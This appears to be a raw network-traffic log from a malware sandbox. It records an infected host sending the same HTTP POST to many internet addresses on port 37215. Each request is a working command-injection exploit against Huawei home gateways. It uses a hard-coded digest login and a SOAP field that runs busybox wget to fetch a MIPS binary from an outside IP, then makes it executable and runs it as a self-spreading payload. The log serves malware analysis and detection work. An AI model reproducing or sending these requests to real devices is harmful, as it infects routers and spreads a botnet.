                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1012192.168.2.1346918157.147.79.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498174906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1013192.168.2.134046242.31.165.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498431921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1014192.168.2.1340294157.200.14.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498469114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1015192.168.2.1357074157.119.162.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498492002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1016192.168.2.134753041.99.21.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498512030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1017192.168.2.1346310157.150.229.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498537064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1018192.168.2.1346998197.157.97.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498577118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1019192.168.2.135537841.86.20.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498919964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1020192.168.2.135539241.90.206.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498951912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1021192.168.2.1339420157.113.153.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498974085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 